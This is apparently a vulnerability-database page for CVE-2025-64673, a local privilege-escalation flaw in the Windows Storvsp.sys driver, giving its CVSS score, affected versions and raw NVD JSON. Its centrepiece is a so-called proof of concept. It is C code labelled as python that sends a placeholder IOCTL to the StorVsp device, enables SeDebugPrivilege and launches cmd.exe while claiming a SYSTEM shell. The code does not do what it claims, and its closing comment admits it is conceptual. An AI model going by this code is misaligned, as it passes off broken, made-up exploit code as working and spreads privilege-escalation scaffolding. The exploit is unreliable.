Security Vulnerability Report
中文
CVE-2025-64673 CVSS 7.8 HIGH

CVE-2025-64673

Published: 2025-12-09 18:16:07
Last Modified: 2025-12-10 19:07:21
Source: [email protected]

Description

Improper access control in Storvsp.sys Driver allows an authorized attacker to elevate privileges locally.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:* - VULNERABLE
Windows 10 versions prior to security update
Windows 11 versions prior to security update
Windows Server 2019 prior to security update
Windows Server 2022 prior to security update
Windows Server 2025 prior to security update

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-64673 PoC - Storvsp.sys Local Privilege Escalation // This PoC demonstrates the improper access control vulnerability in Storvsp.sys // Author: Security Researcher // Date: 2025-12-09 #include <windows.h> #include <stdio.h> #include <stdint.h> // Device name for Storvsp.sys #define DEVICE_NAME "\\\\.\\StorVsp" #define IOCTL_VULNERABLE_OPERATION 0x9C402088 // Example IOCTL code // Function to open handle to the driver HANDLE open_driver_handle() { return CreateFileA( DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL ); } // Trigger the vulnerability BOOL trigger_vulnerability(HANDLE hDevice) { DWORD bytes_returned = 0; uint8_t input_buffer[0x100] = {0}; uint8_t output_buffer[0x100] = {0}; // Initialize input buffer with trigger data memset(input_buffer, 0x41, sizeof(input_buffer)); // Send malicious IOCTL request // The driver fails to properly validate caller privileges BOOL result = DeviceIoControl( hDevice, IOCTL_VULNERABLE_OPERATION, input_buffer, sizeof(input_buffer), output_buffer, sizeof(output_buffer), &bytes_returned, NULL ); return result; } // Escalate to SYSTEM privileges BOOL escalate_privileges() { HANDLE hToken = NULL; HANDLE hNewToken = NULL; TOKEN_PRIVILEGES tp = {0}; // Get current process token if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken)) { return FALSE; } // Enable SeDebugPrivilege tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; tp.Privileges[0].Luid = {0}; if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid)) { CloseHandle(hToken); return FALSE; } AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL); // Spawn SYSTEM shell STARTUPINFOA si = {sizeof(si)}; PROCESS_INFORMATION pi = {0}; si.cb = sizeof(si); if (CreateProcessA( "C:\\\\Windows\\\\System32\\\\cmd.exe", NULL, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi )) { // Wait for shell WaitForSingleObject(pi.hProcess, INFINITE); CloseHandle(pi.hProcess); CloseHandle(pi.hThread); } CloseHandle(hToken); return TRUE; } int main() { printf("[*] CVE-2025-64673 PoC - Storvsp.sys Improper Access Control\n"); printf("[*] Opening handle to StorVsp driver...\n"); HANDLE hDevice = open_driver_handle(); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open driver handle. Error: %d\n", GetLastError()); return 1; } printf("[+] Driver handle opened successfully\n"); printf("[*] Triggering vulnerability...\n"); if (trigger_vulnerability(hDevice)) { printf("[+] Vulnerability triggered successfully\n"); printf("[*] Escalating privileges...\n"); escalate_privileges(); } else { printf("[-] Failed to trigger vulnerability. Error: %d\n", GetLastError()); } CloseHandle(hDevice); return 0; } // Note: This is a conceptual PoC for educational purposes. // Actual exploitation requires further analysis of the specific IOCTL codes // and memory layout of the target system.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64673", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:16:06.750", "lastModified": "2025-12-10T19:07:21.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper access control in Storvsp.sys Driver allows an authorized attacker to elevate privileges locally."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*", "versionEndExcluding": "10.0.17763.8146", "matchCriteriaId": "5CEB496A-8AF3-458D-B466-16204E535DE0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*", "versionEndExcluding": "10.0.17763.8146", "matchCriteriaId": "C99D0580-E443-4440-A211-19BA3C2C4AFA"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19044.6691", "matchCriteriaId": "9D04167A-522C-433E-8CEB-C1D8A02C23D8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.19045.6691", "matchCriteriaId": "A86D6CDC-55E5-4817-A6CE-4CE41921FB79"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.22631.6345", "matchCriteriaId": "6DCE32D0-A9E0-4029-AB35-5E202A42AF01"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7392", "matchCriteriaId": "8DCD2A6E-7CD0-4FCC-AC11-5A1470776C24"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26200.7392", "matchCriteriaId": "8EA08CDD-D682-403D-8B50-879EB4D88C67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2019:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.17763.8146", "matchCriteriaId": "A20DBDB1-D0DE-4800-8BEA-35EE5D53659D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.20348.4467", "matchCriteriaId": "C552FBB4-8F98-492E-A084-AF14C9514A67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2022_23h2:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.25398.2025", "matchCriteriaId": "E9CE4A36-DA42-40CC-8724-E30A22CA84B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:microsoft:windows_server_2025:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.26100.7392", "matchCriteriaId": "35BBEADA-D039-479B-A1BA-B2A7E37235BE"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-64673", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.